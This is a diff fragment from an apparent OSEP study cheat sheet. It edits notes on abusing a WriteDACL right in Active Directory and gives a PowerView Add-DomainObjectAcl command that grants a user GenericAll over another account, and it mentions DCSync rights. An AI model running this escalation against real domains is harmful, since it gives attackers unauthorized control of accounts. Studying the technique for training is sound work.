peterkhe1999/CheatSheet/OSEP/README.md

 Identity              : PROD\offsec
 ```

-Our current user has WriteDACL access rights to the TestService2 user, which allows us to add new access rights like GenericAll.
+=> Our current user has WriteDACL access rights to the TestService2 user => Add new access rights like GenericAll.

 Use the **Add-DomainObjectAcl** PowerView method to apply additional access rights such as GenericAll, GenericWrite, or even DCSync if the targeted object is the domain object.

-Add the GenericAll access right to the TestService2 object:
+Add the **GenericAll** access right to the TestService2 object:

 ```pwsh
 Add-DomainObjectAcl -TargetIdentity testservice2 -PrincipalIdentity offsec -Rights All